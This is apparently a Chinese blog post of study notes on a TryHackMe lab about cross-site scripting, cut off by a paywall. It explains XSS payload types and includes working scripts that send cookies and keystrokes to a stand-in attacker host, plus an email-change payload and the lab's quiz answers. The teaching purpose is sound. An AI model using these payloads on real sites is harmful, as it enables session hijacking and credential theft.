【THM】Cross-site Scripting(跨站脚本)-初级渗透测试

VIP文章 已于 2024-03-28 22:03:33 修改
阅读量854 收藏 8
点赞数 28
文章标签: 安全 web安全 网络安全 学习
于 2024-03-28 21:26:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fatherddd/article/details/132707597
版权

该篇简介

先决条件:
值得注意的是,由于 XSS 基于 JavaScript,因此对该语言有基本的了解会很有帮助。然而,这些示例都不是过于复杂,而且也是对客户端-服务器请求和响应的基本理解。

跨站脚本攻击(在网络安全社区中更广为人知的名称为 XSS)被归类为注入攻击,其中恶意 JavaScript 被注入到 Web 应用程序中,意图由其他用户执行。在这个房间中,您将了解不同的XSS类型、如何创建XSS有效负载、如何修改有效负载以逃避过滤器,然后以一个实际实验室结束,您可以在其中尝试新技能。

跨站点脚本漏洞极为常见。以下是一些 在海量应用中发现的XSS报告;发现并报告这些漏洞可以获得丰厚的报酬。  7500美金,算算多少人民币吧。羡慕

XSS有效负载

什么是有效负载?

在XSS中,有效负载是我们希望在目标计算机上执行的 JavaScript 代码。有效负载有两个部分,意图和修改。

意图是您希望 JavaScript 实际执行的操作(我们将在下面的一些示例中介绍),而修改是对我们需要的代码进行更改,以使其执行,因为每个场景都不同(在完善中详细介绍了这一点)您的有效负载任务)。

以下是XSS意图的一些示例。

概念证明:

这是最简单的有效负载,您所需要做的就是证明您可以在网站上实现XSS 。这通常是通过在页面上弹出一个带有文本字符串的警告框来完成的,例如:

<script>alert('XSS');</script>

会话窃取:

用户会话的详细信息(例如登录令牌)通常保存在目标计算机上的 cookie 中。下面的 JavaScript 获取目标的 cookie,对 cookie 进行 base64 编码以确保成功传输,然后将其发布到黑客控制下的网站以进行记录。一旦黑客拥有这些 cookie,他们就可以接管目标的会话并以该用户的身份登录。

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

可能有没学过javascript的,这里简单解释一下,  

'https://hacker.thm/steal?cookie=' 是请求的URL,这里的?cookie=表明后面会跟着一个cookie值。

btoa(document.cookie) 是一个函数调用,btoa 是Base64编码函数,document.cookie 是一个JavaScript对象属性,它包含了当前网页的所有cookie值。这个调用将当前页面的cookie值转换成Base64编码格式。

按键记录器:

下面的代码充当键盘记录器。这意味着您在网页上输入的任何内容都将被转发到黑客控制下的网站。如果网站将有效负载安装在接受的用户登录或信用卡详细信息上,这可能会造成很大的破坏。

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

代码解释:它会在文档中监听键盘事件。具体来说,它监听keypress事件,每当用户在键盘上按下并释放一个键时,就会执行定义好的函数。

document.onkeypress = function(e) { ... } 这部分代码为document对象上的keypress事件定义了一个事件处理程序。每当文档中发生keypress事件时,都会调用这个函数。

e 是一个事件对象,它包含了关于键盘事件的信息,如按下的键是哪一个(e.key)。

fetch('https://hacker.thm/log?key=' + btoa(e.key) ); 这段代码在键盘事件触发时执行。

  • fetch 是JavaScript中的一个函数,用于发出网络请求。
  • 'https://hacker.thm/log?key=' 是请求的URL,这里的?key=表明后面会跟着一个键值。
  • btoa(e.key) 是将键盘事件中的键值(例如,字符或字符编码)转换为Base64编码。

所以,当用户在键盘上按下并释放一个键时,这个函数会被调用,将按下的键的值转换为Base64编码,然后将其作为查询参数发送到https://hacker.thm/log这个URL。

商业逻辑:

这个有效负载比上面的例子要具体得多。这将涉及调用特定的网络资源或 JavaScript 函数。例如,假设有一个用于更改用户电子邮件地址的 JavaScript 函数,名为user.changeEmail()。您的有效负载可能如下所示:

<script>user.changeEmail('[email protected]');</script>

现在帐户的电子邮件地址已更改,攻击者可能会执行重置密码攻击。
接下来的四个任务将涵盖不同类型的XSS漏洞,所有这些漏洞都需要稍微不同的攻击负载和用户交互。

任务一问题:

哪个文档属性可以包含用户的会话令牌?                     答案:document.cookie

哪种 JavaScript 方法经常用作概念验证?                    答案:alert

反射型XSS

当用户在HTTP请求中提供的数据未经任何验证就包含在网页源中时,就会发生反射型 XSS。

示例场景:
如果您输入的

最低0.47元/天 解锁文章
追风少年亚索
关注
  • 28
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
THM3060--Reader-Source.rar_THM3060
07-15
基于同方芯片THM3060读卡器的实现代码
对vulhub靶机THM-ContainMe-v4的渗透测试过程
weixin_52020240的博客
03-24 4863
靶机信息: kali:192.168.21.129 靶机:
THM】Burp Suite: Intruder - 初级渗透测试
fatherddd的博客
03-30 728
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
THM】SQL Injection(SQL注入)-初级渗透测试
fatherddd的博客
03-29 1388
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
THM】Active Reconnaissance(主动侦察)-初级渗透测试
fatherddd的博客
04-01 1044
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
thm-scripts:TryHackMe-Python脚本
04-19
THM-脚本 Python脚本可获取某些TryHackMe房间的标志。 要求 所有脚本均在Python v3.6上进行了测试。 用法 python3.6 script_name.py 执照
thm-discord-bot:TryHackMe Python Bot
01-28
CMNatic 客房服务/常规维护,集成了帮助中心,反馈,VPN脚本 5nake.exe Exploitdb搜索 szymex73 TryHackMe API调用优化,排行榜生成优化 TuxTheXplorer 八卦 0天添加了Ollie机器人 命令: {required args} | [可选...
thm-api-py:Python THM公共API包装器
05-27
thm = THM ( credentials = creds ) # Logging in is optional thm . get_stats () # {'publicRooms': 203, 'totalUsers': 88017, 'cloneableRooms': 967} 贡献 欢迎您使用您要查看的功能来创建“问题/拉动请求” ...
1687-6180-2010-471842.zip_THM
07-15
A G enet ic Algor i thm Optimization Technique for Multiwavelet - Based Digital Audio Watermarking.
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 972
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
地埋式可燃气体监测终端,地下燃气管网安全“哨兵”
SUNVUA1028的博客
05-10 332
在现代都市的繁华之下,一条条地下燃气管网承载着城市的生命与活力,但管网老化腐蚀,第三方施工破坏,巡检维修不到位等问题,时刻影响着燃气管网安全运行,甚至威胁人民群众的生命财产安全。在这个快速发展的时代,旭华智能埋地式激光可燃气体监测仪,就像燃气管网卫士,时刻守护燃气管网安全,守护人民生命健康和财产安全,为城市的安全发展贡献力量。除监测可燃气体浓度外,还能监测水浸、温度、压力等多种参数,高度集成一体化设计,节省空间的同时,也提升了设备的实用性和便捷性。旭华智能多年来致力于燃气物联网监测领域,自主研发的。
提高岩土工程安全的关键:锚索测力计的应用
yousino1的博客
05-10 211
通过实时监控数据,工程师能够及时发现锚索力量的异常变化,并迅速采取补强措施,成功避免了一次可能的边坡滑坡,确保了施工安全和道路使用的安全。在众多技术和工具中,锚索测力计的应用在提高岩土工程的安全性方面发挥了不可替代的作用。- 坡面和边坡稳定:在施工或自然斜坡可能出现滑移的情况下,通过预应力锚索将斜坡加固,并使用锚索测力计监控锚索的实时力量,及时调整预应力,以防止坡面滑移。锚索测力计作为岩土工程中一项重要的监测工具,随着技术的不断进步,其应用将更加广泛,对保障工程结构的稳定性和安全性具有重大意义。
针对 % 号 | 引起的 不安全情况
m0_74381444的博客
05-11 957
%%%%%%
2024年建筑施工特种作业人员安全生产知识试题
yibaifentiku的博客
05-11 366
7.根据建设部的有关规定,施工单位新招收的合同制工人,及分配来的实习和代培人员,分别要进行三级安全教育,其中第一级安全教育是指( )。3.( )颁布实施,标志着安全生产成为我国现阶段建筑业工作的重点,安全生产制度被确立为促进我国建筑业发展的一项根本制度。8.《生产安全事故报告和调查处理条例》规定,根据生产安全事故造成的人员伤亡或者直接经济损失,事故分为( )等级。5.根据《建设工程安全生产管理条例》,作业人员进入新的岗位或者新的施工现场前,应当接受( )。答案:1-5:DBCBB 6-10:AABBC。
内容安全(DPI和DFI解析)
m0_66993332的博客
05-07 698
深度检测技术DFI和DPI解析
云端安全新纪元:云WAF的崛起
gmqqcsdn的博客
05-13 543
综上所述,云WAF在多个领域具有广泛的应用前景。它能够为企业和个人提供有效的网络安全防护解决方案,降低网络安全风险。然而,在实际应用过程中,云WAF也面临着一些挑战和问题,如如何保证防护效果、如何应对不断变化的攻击手段等。因此,我们需要不断研究和探索新的技术手段和方法,提高云WAF的防护能力和适应性。同时,政府、企业和个人也应加强网络安全意识培养和技术培训,共同营造安全、健康的网络环境。
富格林:梳理可信经验保障安全
fgl100的博客
05-13 226
通过多渠道的收集和分析找到市场的波动趋势,在根据趋势的变化进行交易。如果投资者对趋势变化没有把握的话,可以多留意正规专业的交易平台讯息,一般情况下都会给大家分享市场最新的走势变化,阅读贵金属知识课堂的文章就能够知道很多基本面消息,也能学到各种技术分析方法。富格林悉知,现货黄金被视作一种稳健的投资工具,因其对抗通货膨胀和政治不确定性的能力而备受青睐。如果处于亏损状态的时候,应该保持冷静,理性分析市场波动情况,如果亏损情况严重,应该及时离场保住自己的最大利益,重新调整心态再进场。
Pikachu 靶场 URL 重定向通关解析
Flag少侠的博客
05-13 873
URL重定向是指在网页或应用程序中,当用户访问一个URL时,服务器将用户重定向到另一个URL的过程。URL重定向通常用于实现页面跳转、处理错误情况、进行身份验证和授权等。URL重定向可以分为两种类型:内部重定向和外部重定向。1. 内部重定向:内部重定向是指将用户重定向到同一应用程序内的另一个URL。这通常是通过应用程序内部的路由机制实现的。内部重定向对于处理动态页面、用户会话管理等非常有用。2. 外部重定向:外部重定向是指将用户重定向到不同域名或不同应用程序的URL。
thm3070 模块程序
01-17
thm3070 模块是一种用于测试和诊断电子电路板的设备,它具有高精度测量和控制功能。thm3070 模块程序可以通过编程来控制模块的工作方式和测试过程。 thm3070 模块程序的编写需要使用特定的编程语言和开发环境。它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值